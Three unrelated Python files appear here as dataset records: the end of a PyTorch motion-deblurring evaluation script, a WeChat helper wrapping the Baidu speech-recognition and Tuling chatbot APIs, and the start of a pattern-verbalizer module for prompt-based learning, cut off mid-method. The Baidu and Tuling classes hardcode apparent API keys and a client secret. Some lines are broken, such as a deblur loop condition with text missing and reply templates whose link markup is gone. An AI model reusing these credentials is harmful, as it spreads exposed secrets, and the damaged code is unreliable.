filters)\n out_B = torch.sum(out_B, dim=1).unsqueeze(1)\n return torch.cat([out_R, out_G, out_B], 1)\n\n\n# evaluation/testing demo\n# -----------\n# ##### load a pretrained model\n\n# In[5]:\n\n\n#eval_model(curmodel, dataloaders, dataset_sizes, criterion, device=device)\nloss_ImageReconst = LossOrderedPairReconstruction(device=device, filterSize=kernel_size)\n\n\n################## load model ###################\npath_to_save_paramOnly = os.path.join(save_dir,'epoch-445.paramOnly')\n\n\nprint(path_to_save_paramOnly)\ncurmodel = SiamesePixelEmbed(emb_dimension=embedding_dim, \n filterSize=kernel_size,\n device=device, pretrained=False)\ncurmodel.load_state_dict(torch.load(path_to_save_paramOnly))\ncurmodel.to(device); \n#print(curmodel.state_dict)\ncurmodel.eval()\n#curmodel.train()\n#curmodel.training = False\nprint(curmodel.training)\n\n\n# In[6]:\n\n\n################## evaluate over validation set ###################\ntransform4Image = transforms.Compose(\n [transforms.ToTensor(),\n transforms.Normalize((127.,127.,127.),(127.,127.,127.)) # (mean, std)\n ]) # (mean, std)\n\n\n# moderateBlurDataset severeBlurDataset severeBlurDataset_fullRes moderateBlurDataset_fullRes\nsubset = 'train' \nvalset = Dataset4MotionBlur(root_dir=path_to_root, size=[64,64], # 64x64\n set_name=subset, transform=transform4Image,\n sigmaMin=sigmaMin, sigmaMax=sigmaMax,\n downsampleFactor=1)\n\n#valset = Dataset4MotionBlur__Evaluation(root_dir=path_to_root, size=[-64,-64], # 64x64\n# set_name=subset, transform=transform4Image,\n# sigmaMin=sigmaMin, sigmaMax=sigmaMax,\n# downsampleFactor=1)\n\nvaldataloader = DataLoader(valset, batch_size=1,shuffle=False, num_workers=1) # num_work can be set to batch_size\nprint(len(valset))\n\nobjDemoShowFlow = DemoShowFlow()\n#torch.no_grad()\n\n\n# Full resolution testing\n# ================\n\n# In[7]:\n\n\n# moderateBlurDataset severeBlurDataset severeBlurDataset_fullRes moderateBlurDataset_fullRes\nsubset = 'train' \nvalset = Dataset4MotionBlur(root_dir=path_to_root, size=[-64,-64], # 64x64\n set_name=subset, transform=transform4Image,\n sigmaMin=sigmaMin, sigmaMax=sigmaMax,\n downsampleFactor=1)\n\nvaldataloader = DataLoader(valset, batch_size=1,shuffle=False, num_workers=1) # num_work can be set to batch_size\n\n_, tmp = os.path.split(path_to_save_paramOnly)\ntmp, _ = tmp.split('.')\nresult_dir = './supplDataset'\n#save_dir = os.path.join(result_dir, project_name+'_'+tmp, subset)\nsave_dir = os.path.join(result_dir, 'loop0', 'train', subset)\n\nif not os.path.exists(save_dir): os.makedirs(save_dir)\n#if not os.path.exists(save_dir_deblur): os.makedirs(save_dir_deblur)\nprint(save_dir) \n\nXXX = []\n\npatchSize = 64\npatchStride = 20\npatchBnd2rm = 20\nglobalBnd2rm = 20\nlist_PSNR, list_SSIM, list_PSNR_LR, list_SSIM_LR = [], [], [], []\nlist_PSNR_fullRes, list_SSIM_fullRes, list_PSNR_LR_fullRes, list_SSIM_LR_fullRes = [],[],[],[]\nsampleId = 0\nid_of_interest = -3 # 4 13 17\nstartPoint = 5736\n\nfor sample in iter(valdataloader): \n sampleId += 1 \n if sampleId!=id_of_interest and id_of_interest>=0: continue\n if sampleId=blurImage.size(2): \n start_h=blurImage.size(2)-patchSize\n stopFlagH = 1\n\n stopFlagW = 0\n start_w = 0\n while stopFlagW==0: # start_w+patchSize <= imgList1.size(3): \n if start_w+patchSize>=blurImage.size(3): \n start_w=blurImage.size(3)-patchSize\n stopFlagW = 1\n\n #print(start_h, start_h+patchSize,start_w,start_w+patchSize)\n countPatch += 1\n filterFlow = curmodel(blurImage[:,:,start_h:start_h+patchSize,start_w:start_w+patchSize], 0)\n _ = loss_ImageReconst(blurImage[:,:,start_h:start_h+patchSize,start_w:start_w+patchSize], 0, filterFlow)\n reconsturctedImage2 = loss_ImageReconst.reconstructImage\n\n countMap[start_h+patchBnd2rm:start_h+patchSize-patchBnd2rm,\n start_w+patchBnd2rm:start_w+patchSize-patchBnd2rm, :]+=1\n \n \n if patchBnd2rm>0:\n reconsturctedImage2 = reconsturctedImage2[:,:,patchBnd2rm:-patchBnd2rm,\n patchBnd2rm:-patchBnd2rm]\n filterFlow = filterFlow[:,:,patchBnd2rm:-patchBnd2rm,\n patchBnd2rm:-patchBnd2rm]\n \n \n reconsturctedImage2 = reconsturctedImage2.detach().cpu().numpy().squeeze().transpose((1,2,0)) \n reconstructedHR[start_h+patchBnd2rm:start_h+patchSize-patchBnd2rm,\n start_w+patchBnd2rm:start_w+patchSize-patchBnd2rm, :] += reconsturctedImage2\n \n filterFlow = filterFlow.detach().cpu().numpy()\n filterFlowMap[:,:,start_h+patchBnd2rm:start_h+patchSize-patchBnd2rm,\n start_w+patchBnd2rm:start_w+patchSize-patchBnd2rm] += filterFlow\n\n start_w += patchStride \n if start_w==blurImage.size(3): break \n start_h += patchStride\n\n \n blurImage = blurImage.cpu().numpy().squeeze().transpose((1,2,0)) \n clearImage = clearImage.cpu().numpy().squeeze().transpose((1,2,0))\n \n if globalBnd2rm>0:\n blurImage = blurImage[globalBnd2rm:-globalBnd2rm,globalBnd2rm:-globalBnd2rm,:]\n clearImage = clearImage[globalBnd2rm:-globalBnd2rm,globalBnd2rm:-globalBnd2rm,:]\n reconstructedHR = reconstructedHR[globalBnd2rm:-globalBnd2rm,globalBnd2rm:-globalBnd2rm,:]\n countMap = countMap[globalBnd2rm:-globalBnd2rm,globalBnd2rm:-globalBnd2rm,:]\n filterFlowMap = filterFlowMap[0,:,globalBnd2rm:-globalBnd2rm,globalBnd2rm:-globalBnd2rm]\n \n #imgNoisyFullRes = imgNoisyFullRes[0,:,globalBnd2rm:-globalBnd2rm,globalBnd2rm:-globalBnd2rm]\n #imgFullRes = imgFullRes[0,:,globalBnd2rm:-globalBnd2rm,globalBnd2rm:-globalBnd2rm]\n #reconstructedHR_fullRes = reconstructedHR_fullRes[globalBnd2rm:-globalBnd2rm,globalBnd2rm:-globalBnd2rm,:]\n \n reconstructedHR = np.divide(reconstructedHR,countMap) \n countMap = np.expand_dims(countMap.squeeze(),0)\n filterFlowMap = np.divide(filterFlowMap,countMap)\n \n\n #imgNoisyFullRes, imgFullRes = imgNoisyFullRes.detach().cpu().numpy(), imgFullRes.detach().cpu().numpy() \n #imgNoisyFullRes = imgNoisyFullRes.squeeze()\n #imgFullRes = imgFullRes.squeeze()\n #if globalBnd2rm>0:\n # imgNoisyFullRes = imgNoisyFullRes[globalBnd2rm:-globalBnd2rm,globalBnd2rm:-globalBnd2rm,:]\n # imgFullRes = imgFullRes[globalBnd2rm:-globalBnd2rm,globalBnd2rm:-globalBnd2rm,:]\n \n\n reconstructedHR_fullRes = reconstructedHR\n #reconstructedHR_fullRes = misc.imresize(reconstructedHR_fullRes, (imgFullRes.shape[0],imgFullRes.shape[1]), 'bicubic')\n\n \n flowVisShow=torch.from_numpy(filterFlowMap)\n UV = objDemoShowFlow.filterFlow2UV(flowVisShow).detach().numpy()\n UV = UV/np.ceil(kernel_size/2) \n flowVisShow = objDemoShowFlow.computeColor(UV[0], UV[1]) \n #misc.imsave(os.path.join(save_dir, '{:02d}_filterflow.png'.format(sampleId)), flowVisShow, format='png')\n misc.imsave(os.path.join(save_dir, '{:02d}_blurry.png'.format(sampleId)), reconstructedHR_fullRes, format='png')\n #misc.imsave(os.path.join(save_dir, '{:02d}_blurred.png'.format(sampleId)), imgNoisyFullRes, format='png')\n misc.imsave(os.path.join(save_dir, '{:02d}_GT.png'.format(sampleId)), (clearImage.clip(-1,1)+1)/2*255., format='png')\n \n XXX+=[filterFlowMap]\n \n #imgFullResY = rgb2ycbcr(imgFullRes.astype(np.int))\n #imgFullResY = imgFullResY[:,:,0]\n #imgNoisyFullResY = rgb2ycbcr(imgNoisyFullRes.astype(np.int))\n #imgNoisyFullResY = imgNoisyFullResY[:,:,0]\n #reconstructedHR_fullResY = rgb2ycbcr(reconstructedHR_fullRes.astype(np.int)) \n #reconstructedHR_fullResY = reconstructedHR_fullResY[:,:,0]\n\n #tmp = psnr(reconstructedHR_fullResY, imgFullResY, 255) \n #list_PSNR_fullRes += [tmp] \n #tmp = ssim(reconstructedHR_fullResY, imgFullResY, data_range=imgFullResY.max()-imgFullResY.min()) \n #list_SSIM_fullRes += [tmp]\n #tmp = psnr(imgNoisyFullResY, imgFullResY, 255) \n #list_PSNR_LR_fullRes += [tmp]\n #tmp = ssim(imgNoisyFullResY, imgFullResY, data_range=imgFullResY.max()-imgFullResY.min()) \n #list_SSIM_LR_fullRes += [tmp]\n \n\n clearImageY = rgb2ycbcr(((clearImage+1)/2*255).astype(np.int))\n clearImageY = clearImageY[:,:,0]\n blurImageY = rgb2ycbcr(((blurImage+1)/2*255).astype(np.int))\n blurImageY = blurImageY[:,:,0]\n reconImageY = rgb2ycbcr(((reconstructedHR+1)/2*255).astype(np.int)) \n reconImageY = reconImageY[:,:,0]\n\n tmp = psnr(reconImageY, clearImageY, 255) \n list_PSNR += [tmp] \n tmp = ssim(reconImageY, clearImageY, data_range=clearImageY.max()-clearImageY.min()) \n list_SSIM += [tmp]\n tmp = psnr(blurImageY, clearImageY, 255) \n list_PSNR_LR += [tmp]\n tmp = ssim(blurImageY, clearImageY, data_range=clearImageY.max()-clearImageY.min()) \n list_SSIM_LR += [tmp]\n \n if sampleId%10==0: \n print('{:05d} PSNR:{:.3f}, SSMI:{:.3f} -- blur PSNR:{:.3f}, SSMI:{:.3f}'.format(\n sampleId, list_PSNR[-1], list_SSIM[-1], list_PSNR_LR[-1], list_SSIM_LR[-1], ))\n #print('\\tfullRes PSNR:{:.3f}, SSMI:{:.3f} -- blur PSNR:{:.3f}, SSMI:{:.3f}'.format(\n # list_PSNR_fullRes[-1], list_SSIM_fullRes[-1], list_PSNR_LR_fullRes[-1], list_SSIM_LR_fullRes[-1], ))\n if sampleId>=id_of_interest>=0: break\n\n\n# In[ ]:\n\n\nobjDemoShowFlow = DemoShowFlow()\n\nfigWinNumHeight, figWinNumWidth = 2, 2\nplt.figure(figsize=(11,11), dpi=96, facecolor='w', edgecolor='k') # figsize -- inch-by-inch\nplt.clf()\nsubwinCount = 1 \nplt.subplot(figWinNumHeight,figWinNumWidth,subwinCount)\nsubwinCount += 1 \nplt.imshow((blurImage.clip(-1,1)+1)/2)\nplt.axis('off')\nplt.title('blurry image')\n\n\nplt.subplot(figWinNumHeight,figWinNumWidth,subwinCount)\nsubwinCount += 1 \nplt.imshow((reconstructedHR.clip(-1,1)+1)/2)\nplt.axis('off')\nplt.title('deblurred image')\n\n\nplt.subplot(figWinNumHeight,figWinNumWidth,subwinCount)\nsubwinCount += 1\nflowVisShow=torch.from_numpy(filterFlowMap)\nUV = objDemoShowFlow.filterFlow2UV(flowVisShow).detach().numpy()\nUV = UV/np.ceil(kernel_size/2)\n#UV = UV/UV.max()\nflowVisShow = objDemoShowFlow.computeColor(UV[0], UV[1])/255. \nplt.imshow(flowVisShow) # torch.from_numpy(flowVis)\nplt.axis('off')\nplt.title('filter flow')\n\n#misc.imsave('deblur_filterflow.png', flowVisShow*255, format='png')\n\n","sub_path":"tutorial_pytorch_17_motionblur/main900_save_trainset.py","file_name":"main900_save_trainset.py","file_ext":"py","file_size_in_byte":18095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"208893518","text":"# -*- coding: utf-8 -*-\n\"\"\"\n第三方api接入\n百度语音识别\n七牛云存储\n\"\"\"\nimport requests\nimport base64\nimport json\n\n\n# Baidu 语音识别\n# App ID: 4810653\n# API Key: LjL2tSwrKmnDLLEMPazCkEce\n# Secret Key: E4IPseqzFbD7NeyzvPneXeKEo2dORLeR\nclass BaiDuVoice(object):\n voice_url = 'https://openapi.baidu.com/oauth/2.0/token?grant_type=%s&client_id=%s&client_secret=%s'\n grant_type = 'client_credentials'\n client_id = 'LjL2tSwrKmnDLLEMPazCkEce'\n client_secret = 'E4IPseqzFbD7NeyzvPneXeKEo2dORLeR'\n\n def __init__(self):\n pass\n\n def get_access_token(self):\n \"\"\"\n @return:\n {\n \"access_token\": \"1.a6b7dbd428f731035f771b8d********.86400.1292922000-2346678-124328\",\n \"expires_in\": 86400,\n \"refresh_token\": \"2.385d55f8615fdfd9edb7c4b********.604800.1293440400-2346678-124328\",\n \"scope\": \"public\",\n \"session_key\": \"ANXxSNjwQDugf8615Onqeik********CdlLxn\",\n \"session_secret\": \"248APxvxjCZ0VEC********aK4oZExMB\",\n }\n \"\"\"\n url = self.voice_url % (self.grant_type, self.client_id, self.client_secret)\n res = requests.request('get', url)\n return res.json()\n\n def analysis_voice(self, params={}):\n \"\"\"\n format\tsting\t必填\t语音压缩的格式,请填写上述格式之一,不区分大小写\n rate\tint\t必填\t采样率,支持 8000 或者 16000\n channel\tint\t必填\t声道数,仅支持单声道,请填写 1\n cuid\tstring\t必填\t用户唯一标识,用来区分用户,填写机器 MAC 地址或 IMEI 码,长度为60以内\n token\tstring\t必填\t开放平台获取到的开发者 access_token\n ptc\tint\t选填\t协议号,下行识别结果选择,默认 nbest 结果\n lan\tstring\t选填\t语种选择,中文=zh、粤语=ct、英文=en,不区分大小写,默认中文\n url\tstring\t选填\t语音下载地址\n callback\tstring\t选填\t识别结果回调地址\n speech\tstring\t选填\t真实的语音数据 ,需要进行base64 编码\n len\tint\t选填\t原始语音长度,单位字节\n 其中,开发者可以把语音数据放在 JSON 序列的“speech”字段中,需要将语音先进行 base64编码,并标明语音数据的原始长度,\n 填写“len”字段;也可以直接提供语音下载地址放在“url”字段中,并且提供识别结果的回调地址,放在“callback”参数中。\n 因此“speech”和“len”参数绑定,“url”和“callback”参数绑定,这两组参数二选一填写,如果都填,默认处理第一种。\n\n 这里选择base64编码\n @param voice:\n @return:\n \"\"\"\n voice = params['voice']\n speech = base64.b64encode(voice)\n token = self.get_access_token()['access_token']\n\n data = dict()\n data['cuid'] = 'baidu_voice_analysis_voice'\n data['token'] = token\n data['format'] = params['format']\n data['channel'] = 1\n data['rate'] = 8000\n data['len'] = len(voice)\n data['speech'] = speech\n\n url = 'http://vop.baidu.com/server_api'\n res = requests.request('post', url, data=json.dumps(data), headers={'Content-Type': 'application/json'})\n return res\n\n\nbaidu = BaiDuVoice()\n\n\n# 图灵机器人问答\nclass QARobot(object):\n \"\"\"\n 图灵机器人问答 ,回复用户发来的语音或文字\n\n Code\t说明\n 100000\t文本类\n {\n \"code\":100000,\n \"text\":\"你也好 嘻嘻\"\n }\n 200000\t链接类\n {\n \"code\": 200000,\n \"text\": \"亲,已帮你找到图片\",\n \"url\": \"http://m.image.so.com/i?q=%E5%B0%8F%E7%8B%97\"\n }\n\n 302000\t新闻类\n {\n \"code\": 302000,\n \"text\": \"亲,已帮您找到相关新闻\",\n \"list\": [\n {\n \"article\": \"工信部:今年将大幅提网速降手机流量费\",\n \"source\": \"网易新闻\",\n \"icon\": \"\",\n \"detailurl\": \"http://news.163.com/15/0416/03/AN9SORGH0001124J.html\"\n },\n {\n \"article\": \"北京最强沙尘暴午后袭沪 当地叫停广场舞\",\n \"source\": \"网易新闻\",\n \"icon\": \"\",\n \"detailurl\": \"http://news.163.com/15/0416/14/ANB2VKVC00011229.html\"\n },\n {\n \"article\": \"公安部:小客车驾照年内试点自学直考\",\n \"source\": \"网易新闻\",\n \"icon\": \"\",\n \"detailurl\": \"http://news.163.com/15/0416/01/AN9MM7CK00014AED.html\"\n }\n ]\n }\n 308000\t菜谱类\n {\n \"code\": 308000,\n \"text\": \"亲,已帮您找到菜谱信息\",\n \"list\": [\n {\n \"name\": \"鱼香肉丝\",\n \"icon\": \"http://i4.xiachufang.com/image/280/cb1cb7c49ee011e38844b8ca3aeed2d7.jpg\",\n \"info\": \"猪肉、鱼香肉丝调料 | 香菇、木耳、红萝卜、黄酒、玉米淀粉、盐\",\n \"detailurl\": \"http://m.xiachufang.com/recipe/264781/\"\n }\n ]\n }\n 313000(儿童版)\t儿歌类\n 314000(儿童版)\t诗词类\n\n 错误吗\n 40001\t参数key错误\n 40002\t请求内容info为空\n 40004\t当天请求次数已使用完\n 40007\t数据格式异常\n \"\"\"\n\n @classmethod\n def get_reply(cls, info, userid):\n\n url = u\"http://www.tuling123.com/openapi/api?key={key}&info={info}&userid={userid}\"\n apikey = '1b674544c532430f9af0bfb80a6230c6'\n params = {\n \"key\": apikey, # 您申请到的本接口专用的APPKEY\n \"info\": info, # 要发送给机器人的内容,不要超过30个字符\n \"userid\": userid, # 1~32位,此userid针对您自己的每一个用户,用于上下文的关联\n\n }\n res = requests.request('get', url.format(**params))\n try:\n data = res.json()\n if data['code'] == 100000:\n reply = data['text']\n elif data['code'] == 200000:\n reply = u\"%s\\n\\n点击查看\\n\" % (data['text'], data['url'])\n elif data['code'] == 302000:\n news = ''\n new_template = u\"{title}\\n\\n\"\n for new in data['list'][:5]:\n news += new_template.format(url=new['detailurl'], title=new['article'])\n reply = u\"%s\\n\\n%s\\n\" % (data['text'], news)\n elif data['code'] == 308000:\n menus = ''\n menu_template = u\"{title}\\n[{info}]\\n\\n\"\n for menu in data['list'][:5]:\n menus += menu_template.format(url=menu['detailurl'], title=menu['name'], info=menu['info'])\n reply = u\"%s\\n\\n%s\\n\" % (data['text'], menus)\n else:\n reply = u'抱歉,我的主人出门了'\n return {'success': True, 'reply': reply}\n except Exception as e:\n return {'success': False, 'msg': e.message}\n","sub_path":"wechat/third_party_api/apis.py","file_name":"apis.py","file_ext":"py","file_size_in_byte":7121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"83675409","text":"# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"\nThis file contains the pattern-verbalizer pairs (PVPs) for all tasks.\n\"\"\"\nimport copy\nimport random\nimport string\nfrom abc import ABC, abstractmethod\nfrom collections import defaultdict\nfrom typing import Tuple, List, Union, Dict\nimport numpy as np\n\nfrom tasks.data_utils import InputExample, num_special_tokens_to_add, build_input_from_ids, build_sample, \\\n build_decoder_input, build_decoder_sample\nfrom utils import print_rank_0\n\nFilledPattern = Tuple[List[Union[str, Tuple[str, bool]]], List[Union[str, Tuple[str, bool]]]]\n\n\nclass PVP(ABC):\n \"\"\"\n This class contains functions to apply patterns and verbalizers as required by PET. Each task requires its own\n custom implementation of a PVP.\n \"\"\"\n is_multi_token = False\n\n def __init__(self, args, tokenizer, label_list, max_seq_length, pattern_id=0, seed=42, fast_decode=False,\n continuous_prompt=False):\n \"\"\"\n Create a new PVP.\n\n :param args: the args\n :param tokenizer: the tokenizer\n :param label_list: the list of labels\n :param max_seq_length: the maximum length of the sequence\n :param pattern_id: the pattern id to use\n :param seed: a seed to be used for generating random numbers if necessary\n :param is_multi_token: if the verbalizers contain multiple tokens\n :param fast_decode: whether to use the fast decode mode for multi-token tasks\n :param continuous_prompt: whether to use continuous prompt optimization\n \"\"\"\n self.args = args\n self.tokenizer = tokenizer\n self.label_list = label_list\n self.max_seq_length = max_seq_length\n self.pattern_id = pattern_id\n self.rng = random.Random(seed)\n self.num_truncated = 0\n self.fast_decode = fast_decode\n self.max_dec_seq_length = 16\n self.continuous_prompt = continuous_prompt\n\n @property\n def spell_length(self):\n return 0\n\n @property\n def mask(self) -> str:\n \"\"\"Return the underlying LM's mask token\"\"\"\n return self.tokenizer.get_command('MASK').Id\n\n @property\n def mask_id(self) -> int:\n \"\"\"Return the underlying LM's mask id\"\"\"\n return self.tokenizer.get_command('MASK').Id\n\n @property\n def max_num_verbalizers(self) -> int:\n \"\"\"Return the maximum number of verbalizers across all labels\"\"\"\n return max(len(self.verbalize(label)) for label in self.label_list)\n\n @staticmethod\n def shortenable(s):\n \"\"\"Return an instance of this string that is marked as shortenable\"\"\"\n return s, True\n\n @staticmethod\n def remove_final_punc(s: Union[str, Tuple[str, bool]]):\n \"\"\"Remove the final punctuation mark\"\"\"\n if isinstance(s, tuple):\n return PVP.remove_final_punc(s[0]), s[1]\n return s.rstrip(string.punctuation)\n\n @staticmethod\n def lowercase_first(s: Union[str, Tuple[str, bool]]):\n \"\"\"Lowercase the first character\"\"\"\n if isinstance(s, tuple):\n return PVP.lowercase_first(s[0]), s[1]\n return s[0].lower() + s[1:]\n\n @staticmethod\n def uppercase_first(s: Union[str, Tuple[str, bool]]):\n \"\"\"Lowercase the first character\"\"\"\n if isinstance(s, tuple):\n return PVP.uppercase_first(s[0]), s[1]\n return s[0].upper() + s[1:]\n\n def encode(self, example: InputExample, priming: bool = False, labeled: bool = False):\n \"\"\"\n Encode an input example using this pattern-verbalizer pair.\n\n :param example: the input example to encode\n :param priming: whether to use this example for priming\n :param labeled: if ``priming=True``, whether the label should be appended to this example\n :return: A tuple, consisting of a list of input ids and a list of token type ids\n \"\"\"\n\n if not priming:\n assert not labeled, \"'labeled' can only be set to true if 'priming' is also set to true\"\n\n tokenizer = self.tokenizer\n raw_parts_a, raw_parts_b = self.get_parts(example)\n\n raw_parts_a = [x if isinstance(x, tuple) else (x, False) for x in raw_parts_a]\n prompt_id = tokenizer.num_tokens\n\n def encode_input(raw_parts):\n parts, flags = [], []\n for x, s in raw_parts:\n if isinstance(x, str):\n x = tokenizer.EncodeAsIds(x)\n flag = [0] * len(x)\n elif isinstance(x, int):\n flag = [1] * x\n x = [prompt_id] * x\n else:\n flag = [0] * len(x)\n parts.append((x, s))\n flags.append((flag, x))\n return parts, flags\n\n parts_a, flags_a = encode_input(raw_parts_a)\n parts_b, flags_b = None, None\n if raw_parts_b:\n raw_parts_b = [x if isinstance(x, tuple) else (x, False) for x in raw_parts_b]\n parts_b, flags_b = encode_input(raw_parts_b)\n\n if self.is_multi_token:\n answers = self.get_answers(example)\n\n if not self.fast_decode:\n ids_list, positions_list, sep_list, mask_list, target_list, prompt_list = [], [], [], [], [], []\n for idx, answer in enumerate(answers):\n this_parts_a, this_parts_b = copy.deepcopy(parts_a), copy.deepcopy(parts_b)\n answer_ids = get_verbalization_ids(answer, tokenizer, force_single_token=False)\n answer_ids = answer_ids + [tokenizer.get_command('eop').Id]\n self.num_truncated += self.truncate(this_parts_a, this_parts_b, answer_ids,\n max_length=self.max_seq_length)\n tokens_a = [token_id for part, _ in this_parts_a for token_id in part]\n tokens_b = [token_id for part, _ in this_parts_b for token_id in part] if parts_b else None\n data = build_input_from_ids(tokens_a, tokens_b, answer_ids, self.max_seq_length, self.tokenizer,\n args=self.args, add_cls=True, add_sep=False, add_piece=True,\n mask_id=self.mask_id)\n ids, types, paddings, position_ids, sep, target_ids, loss_masks = data\n prompt_pos = [idx for idx, token in enumerate(ids) if token == prompt_id]\n ids = [idx if idx != prompt_id else 0 for idx in ids]\n prompt_list.append(prompt_pos)\n ids_list.append(ids)\n positions_list.append(position_ids)\n sep_list.append(sep)\n target_list.append(target_ids)\n mask_list.append(loss_masks)\n if example.label is not None:\n label = self.label_list.index(example.label)\n else:\n label = 0\n sample = build_sample(ids_list, positions=positions_list, masks=sep_list, label=label,\n logit_mask=mask_list, target=target_list, unique_id=example.guid,\n prompt_ids=prompt_list)\n return sample\n\n else:\n this_parts_a, this_parts_b = copy.deepcopy(parts_a), copy.deepcopy(parts_b)\n self.num_truncated += self.truncate(this_parts_a, this_parts_b, None, max_length=self.max_seq_length)\n tokens_a = [token_id for part, _ in this_parts_a for token_id in part]\n tokens_b = [token_id for part, _ in this_parts_b for token_id in part] if parts_b else None\n data = build_input_from_ids(tokens_a, tokens_b, None, self.max_seq_length, self.tokenizer,\n args=self.args, add_cls=True, add_sep=False, add_piece=False)\n ids, types, paddings, position_ids, sep, target_ids, loss_masks = data\n if example.label is not None:\n label = self.label_list.index(example.label)\n else:\n label = 0\n sample = build_sample(ids, positions=position_ids, masks=sep, label=label, unique_id=example.guid)\n\n ids_list, positions_list, mask_list, target_list, logit_mask_list = [], [], [], [], []\n for answer in answers:\n answer_ids = get_verbalization_ids(answer, tokenizer, force_single_token=False)\n answer_ids = answer_ids + [tokenizer.get_command('eop').Id]\n answer_ids = answer_ids[:self.max_dec_seq_length]\n data = build_decoder_input(ids, answer_ids, self.max_seq_length, self.max_dec_seq_length, tokenizer)\n dec_ids, _, _, dec_position_ids, _, dec_target_ids, dec_loss_masks = data\n ids_list.append(dec_ids)\n positions_list.append(dec_position_ids)\n mask_list.append(sep)\n target_list.append(dec_target_ids)\n logit_mask_list.append(dec_loss_masks)\n\n sample = build_decoder_sample(sample, ids_list, positions_list, mask_list, target_list, logit_mask_list)\n return sample\n\n else:\n self.num_truncated += self.truncate(parts_a, parts_b, [], max_length=self.max_seq_length)\n\n tokens_a = [token_id for part, _ in parts_a for token_id in part]\n tokens_b = [token_id for part, _ in parts_b for token_id in part] if parts_b else None\n if priming:\n input_ids = tokens_a\n if tokens_b:\n input_ids += tokens_b\n if labeled:\n mask_idx = input_ids.index(self.mask_id)\n assert mask_idx == 1, 'sequence of input_ids must contain a mask token'\n assert len(self.verbalize(example.label)) == 1, 'priming only supports one verbalization per label'\n verbalizer = self.verbalize(example.label)[0]\n verbalizer_id = get_verbalization_ids(verbalizer, self.tokenizer, force_single_token=True)\n input_ids[mask_idx] = verbalizer_id\n return input_ids\n data = build_input_from_ids(tokens_a, tokens_b, None, self.max_seq_length, self.tokenizer, args=self.args,\n add_cls=True, add_sep=False, add_piece=True)\n ids, types, paddings, position_ids, sep, target_ids, loss_masks = data\n prompt_pos = [idx for idx, token in enumerate(ids) if token == prompt_id]\n ids = [token if token != prompt_id else 0 for token in ids]\n target_ids = self.get_verbalizer_ids()\n if example.label is not None:\n label = self.label_list.index(example.label)\n else:\n label = 0\n sample = build_sample(ids=ids, positions=position_ids, target=target_ids, masks=sep, logit_mask=loss_masks,\n label=label, unique_id=example.guid, prompt_ids=prompt_pos)\n return sample\n\n @staticmethod\n def _seq_length(parts: List[Tuple[List[int], bool]], only_shortenable: bool = False):\n return sum([len(x) for x, shortenable in parts if not only_shortenable or shortenable]) if parts else 0\n\n @staticmethod\n def _remove_last(parts: List[Tuple[List[int], bool]]):\n last_idx = max(idx for idx, (seq, shortenable) in enumerate(parts) if shortenable and seq)\n parts[last_idx] = (parts[last_idx][0][:-1], parts[last_idx][1])\n\n def truncate(self, parts_a: List[Tuple[List[int], bool]], parts_b: List[Tuple[List[int], bool]], answer: List[int],\n max_length: int):\n \"\"\"Truncate two sequences of text to a predefined total maximum length\"\"\"\n total_len = self._seq_length(parts_a) + self._seq_length(parts_b)\n if answer:\n total_len += len(answer)\n total_len += num_special_tokens_to_add(parts_a, parts_b, answer, add_cls=True, add_sep=False, add_piece=True)\n num_tokens_to_remove = total_len - max_length\n\n if num_tokens_to_remove <= 0:\n return False\n\n for _ in range(num_tokens_to_remove):\n if self._seq_length(parts_a, only_shortenable=True) > self._seq_length(parts_b, only_shortenable=True):\n self._remove_last(parts_a)\n else:\n self._remove_last(parts_b)\n return True\n\n @abstractmethod\n def get_parts(self, example: InputExample) -> FilledPattern:\n \"\"\"\n Given an input example, apply a pattern to obtain two text sequences (text_a and text_b) containing exactly one\n mask token (or one consecutive sequence of mask tokens for PET with multiple masks). If a task requires only a\n single sequence of text, the second sequence should be an empty list.\n\n :param example: the input example to process\n :return: Two sequences of text. All text segments can optionally be marked as being shortenable.\n \"\"\"\n pass\n\n def get_answers(self, example: InputExample):\n return [self.verbalize(label)[0] for label in self.label_list]\n\n def get_verbalizer_ids(self):\n target_ids = []\n for label in self.label_list:\n verbalizer = self.verbalize(label)[0]\n verbalizer_id = get_verbalization_ids(verbalizer, self.tokenizer, force_single_token=True)\n target_ids.append(verbalizer_id)\n return target_ids\n\n @abstractmethod\n def verbalize(self, label) -> List[str]:\n \"\"\"\n Return all verbalizations for a given label.\n\n :param label: the label\n :return: the list of verbalizations\n \"\"\"\n pass\n\n def get_mask_positions(self, input_ids: List[int]) -> List[int]:\n label_idx = input_ids.index(self.mask_id)\n labels = [-1] * len(input_ids)\n labels[label_idx] = 1\n return labels\n\n @staticmethod\n def _load_verbalizer_from_file(path: str, pattern_id: int):\n\n verbalizers = defaultdict(dict) # type: Dict[int, Dict[str, List[str]]]\n current_pattern_id = None\n\n with open(path, 'r') as fh:\n for line in fh.read().splitlines():\n if line.isdigit():\n current_pattern_id = int(line)\n elif line:\n label, *realizations = line.split()\n verbalizers[current_pattern_id][label] = realizations\n\n print_rank_0(\"Automatically loaded the following verbalizer: \\n {}\".format(verbalizers[pattern_id]))\n\n def verbalize(label) -> List[str]:\n return verbalizers[pattern_id][label]\n\n return verbalize\n\n\nclass CopaPVP(PVP):\n is_multi_token = True\n\n @property\n def spell_length(self):\n return self.pattern_id\n\n def get_answers(self, example: InputExample):\n choice1 = \" \" + self.remove_final_punc(self.lowercase_first(example.meta['choice1']))\n choice2 = \" \" + self.remove_final_punc(self.lowercase_first(example.meta['choice2']))\n return [choice1, choice2]\n\n def get_parts(self, example: InputExample) -> FilledPattern:\n assert self.pattern_id in [0, 1, 2, 3]\n premise = self.remove_final_punc(self.shortenable(\" \" + example.text_a))\n choice1 = self.remove_final_punc(self.lowercase_first(example.meta['choice1']))\n choice2 = self.remove_final_punc(self.lowercase_first(example.meta['choice2']))\n\n question = example.meta['question']\n assert question in ['cause', 'effect']\n if question == 'cause':\n joiner = ' because'\n else:\n joiner = ', so'\n if self.continuous_prompt:\n if self.pattern_id == 1:\n return [1, '\"', choice1, '\" or \"', choice2, '\"', premise, joiner, [self.mask], '.'], []\n elif self.pattern_id 